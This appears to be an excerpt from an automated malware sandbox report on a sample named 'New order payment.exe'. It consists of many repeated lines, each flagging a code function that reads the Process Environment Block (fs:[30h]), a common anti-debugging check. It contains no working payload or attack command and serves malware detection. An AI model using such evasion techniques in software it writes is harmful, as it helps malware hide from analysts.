          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A54015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A07016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A51074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A42073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A449A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A069A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A051BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A99BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A141E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009852A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00985210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00985210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00985210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00985210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00998A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00989240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009C927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A14257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A55BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00991B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00991B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A3D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A053CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009ADBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009AA309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0098DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_0099849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A414FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A58CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A41C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A5740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A06C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A1C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009A746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009BFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A505AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00982D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_009B35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exeCode function: 1_2_00A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A4FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A38DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A06DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A06DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_0099D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_0099D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A58D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A0A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A4E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009B4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_0098AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00993D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009A7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_009C3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\New order payment.exe  Code function: 1_2_00A03540 mov eax, dword ptr fs:[00000030h]
